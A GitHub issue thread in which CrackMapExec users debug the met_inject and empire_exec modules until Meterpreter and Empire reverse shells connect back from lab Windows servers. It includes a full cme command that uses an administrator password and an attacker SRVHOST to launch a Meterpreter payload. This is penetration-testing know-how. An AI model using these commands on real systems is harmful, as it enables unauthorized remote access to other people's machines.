Module empire and metasploit not working

[mpgn]

Following an issue encountered by @n0bl1nk

But still can't get a reverse-shell met_inject and empire_exec why? There is a section in my blog post that I mentioned about cme and I want to solve it.

empire_exec

met_inject

after running commands metasploit listener:

empire listener:

target system windows 2012 r2 I can successfully log in with metasploit psexec

cme can successfully do these and similar commands

Originally posted by @n0bl1nk in https://github.com/byt3bl33d3r/CrackMapExec/issues/355#issuecomment-621449439

[mpgn]

Alright, I'm not familiar with Empire https://github.com/BC-SECURITY/Empire/ neither with Metasploit so if anyone is ready to help, we will appreciate.

Maybe linked to https://github.com/byt3bl33d3r/CrackMapExec/issues/192 for Empire

[lolcatlolcat]

Responded to the wrong issue earlier so moved it here. Tested the powershell-empire (BC-Security one) this morning with the latest cme and it worked for me. Ran from kali linux against a fresh install of Server2016.

[mpgn]

Nice @lolcatlolcat since you have this module working with Empire BC-Security, can you update the wiki of CME with the steps to make the module works (if something change) so that @n0bl1nk and I can test it ? Thanks

https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101#empire-agent

[lolcatlolcat]

Nice @lolcatlolcat since you have this module working with Empire BC-Security, can you update the wiki of CME with the steps to make the module works (if something change) so that @n0bl1nk and I can test it ? Thanks

https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101#empire-agent

Absolutely, I can do that. I'm troubleshooting the msf one now too, hopefully I can get them both working.

[n0bl1nk]

Nice @lolcatlolcat since you have this module working with Empire BC-Security, can you update the wiki of CME with the steps to make the module works (if something change) so that @n0bl1nk and I can test it ? Thanks

I waiting for update the wiki

[mpgn]

Good !

[lolcatlolcat]

I think there is something funky going on with met_inject that I'm just not smart enough to troubleshoot further. Even if I remove cme from the equation and just try to run the Inject-Shellcode manually on the target, I'm noticing that the process completely crashes. I wonder if that's causing the assertion error? Because it's not a clean close? I don't know enough about how python handles sockets/tcp. I've tried both the reverse_http and reverse_https no dice on either.

[mpgn]

Yes, code is broken, I use https://github.com/jaredhaight/Invoke-MetasploitPayload to make it works. More simple less broken but not injected into memory.

[mpgn]

Can you test and tell me what do you think about this one @lolcatlolcat ? https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101#meterpreter

You may want to use this command before git submodule update --recursive to add the submodule

[lolcatlolcat]

Not working for me. I'm still getting assertion errors.

[mpgn]

Can you check again ? (you should have meterpreter working even with the error)

[lolcatlolcat]

Don't know if it's a "me" thing. I tried cme and also tried just the Invoke-MetasploitPayload directly on the target (tried a server 2016 box and a win10) and it's not calling back to my MSF but if I run the powershell directly (the posh that msf spits out) it works. So i'm guessing something isn't working right between the target <-> attacker (it very may well be virtualbox not wanting to play nice or something.)

[mpgn]

Try without SSL and try with a real IP for the binding not 0.0.0.0

[lolcatlolcat]

w00t!

[lolcatlolcat]

I had to modify the met_inject.py to allow the use of a non-https stager URL. Do you want me to PR and push? STAGER module option shellz

[n0bl1nk]

I tried the new method result :/

[lolcatlolcat]

I tried the new method result :/

@n0bl1nk you need to checkout the v5-metasploit branch and get the Invoke-MetasploitPayload.ps1 version of met_inject

[mpgn]

I had to modify the met_inject.py to allow the use of a non-https stager URL. Do you want me to PR and push? STAGER module option shellz

Ok yes, PAYLOD=reverse_http, it's already included in the code

https://github.com/byt3bl33d3r/CrackMapExec/blob/v5-metasploit/cme/modules/met_inject.py#L30

[n0bl1nk]

I updated metasploit. But I think I am having problems because some dependencies are out of date in the system. I will update completely

[mpgn]

Okay, keep me update, you're an awesome beta tester :D

[lolcatlolcat]

I had to modify the met_inject.py to allow the use of a non-https stager URL. Do you want me to PR and push? STAGER module option shellz

Ok yes, PAYLOD=reverse_http, it's already included in the code

https://github.com/byt3bl33d3r/CrackMapExec/blob/v5-metasploit/cme/modules/met_inject.py#L30

But since the payload is different than the stager (which is the URL used by the Invoke-MetasploitPayload.ps1) shouldn't it make sense to remove the confusion and rename it to reference the stager? In my case the "working" exploit was an http stager (the SRVHOST in msfconsole) + a windows/meterpreter/reverse_https payload.

[mpgn]

You mean rename it to SRVHOST=https / SRVHOST=http or STAGER=https / STAGER=http instead of PAYLOAD ?

[lolcatlolcat]

You mean rename it to SRVHOST=https / SRVHOST=http or STAGER=https / STAGER=http instead of PAYLOAD ?

Yup.

[mpgn]

I rename multiples variable

cme smb 192.168.255.131 -u administrator -p 'Password@123' -M met_inject -o SRVHOST=192.168.255.137 SRVPORT=1337 RAND=ddddddd

[n0bl1nk]

no option for windows/meterpreter/reverse_https i tried this payload "multi/meterpreter/reverse_https" not working on me

metasploit version

Updated all the packages. i am trying to fix

[mpgn]

I will be honest, I don't understand the issue on your previous message :confused:

[lolcatlolcat]

no option for windows/meterpreter/reverse_https i tried this payload "multi/meterpreter/reverse_https" not working on me

metasploit version

Updated all the packages. i am trying to fix

@n0bl1nk did you change the target from python to posh? set target 2 that should give you the option.

[n0bl1nk]

I will be honest, I don't understand the issue on your previous message 😕

:) I installed a new linux. Let's do it step by step

apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone -b v5-metapsloit https://github.com/byt3bl33d3r/CrackMapExec.git
cd CrackMapExec && python3 setup.py isntall

Let's fix this first

[n0bl1nk]

no option for windows/meterpreter/reverse_https i tried this payload "multi/meterpreter/reverse_https" not working on me metasploit version Updated all the packages. i am trying to fix

@n0bl1nk did you change the target from python to posh? set target 2 that should give you the option.

I missed it this is work! Thanks

[mpgn]

Everyting works for you @n0bl1nk ?

[n0bl1nk]

Everyting works for you @n0bl1nk ?

v5-metasploit It did not work. i'm dealing with it

[n0bl1nk]

I will be honest, I don't understand the issue on your previous message 😕

:) I installed a new linux. Let's do it step by step

apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone -b v5-metapsloit https://github.com/byt3bl33d3r/CrackMapExec.git
cd CrackMapExec && python3 setup.py isntall

Let's fix this first

installed it from 2 different virtual machines. The same problem in both.

[lolcatlolcat]

I will be honest, I don't understand the issue on your previous message 😕

:) I installed a new linux. Let's do it step by step

apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone -b v5-metapsloit https://github.com/byt3bl33d3r/CrackMapExec.git
cd CrackMapExec && python3 setup.py isntall

Let's fix this first

installed it from 2 different virtual machines. The same problem in both.

Use the pre-compiled binaries provided and see if that works? Additionally, if you're going to clone from source, you need to follow the wiki and follow those instructions. Once you have it cloned/installed/running you can switch branches simply using git checkout whatever-branchname you don't need to clone using the branch name.

[n0bl1nk]

I noticed something. I install cme on kali 2019.2 and it worked --

metasploit didn't work due to some issues when updated.

https://github.com/rubygems/rubygems/issues/3068 https://github.com/rapid7/metasploit-framework/issues/11597

I tried everything in these solutions, it didn't, and I noticed that those who had successful results have the latest kernel version. runs these commands: apt update && apt dist-upgrade Kali 2019.2 -> Kali 2020 upgrade metasploit worked but cme didn't work after these commands.

cme Errors:

kali version:

[mpgn]

Please use this bineary https://github.com/byt3bl33d3r/CrackMapExec/actions/runs/93393519

[n0bl1nk]

Please use this bineary https://github.com/byt3bl33d3r/CrackMapExec/actions/runs/93393519

tested everything seems to be right. I didn't see any errors except 'lsassy'.

I didn't get a connection with met_inject Details[]: Metasploit output:

cme met_inject output:

cme mimikatz output:

cme sam--lsa--ntds--X--x--spider is works well--

[n0bl1nk]

Hey it didn't work due to misuse so i fix the above part.

I got a session: 1-

2-

3-

Warning message appears periodically. I will try to fix this. D:

[mpgn]

Alright, metrepreter working, as for the error in metasploit this is not related to CME so i'm closing the issue

[n0bl1nk]

Fixing for ruby 2.7.x: line 79 --> self.raw_uri = URI.decode(md[2]) --> self.raw_uri = CGI.unescape(md[2]) replace with this and restart metasploit orjinal post details: https://github.com/rapid7/metasploit-framework/pull/13363 happy ending 💯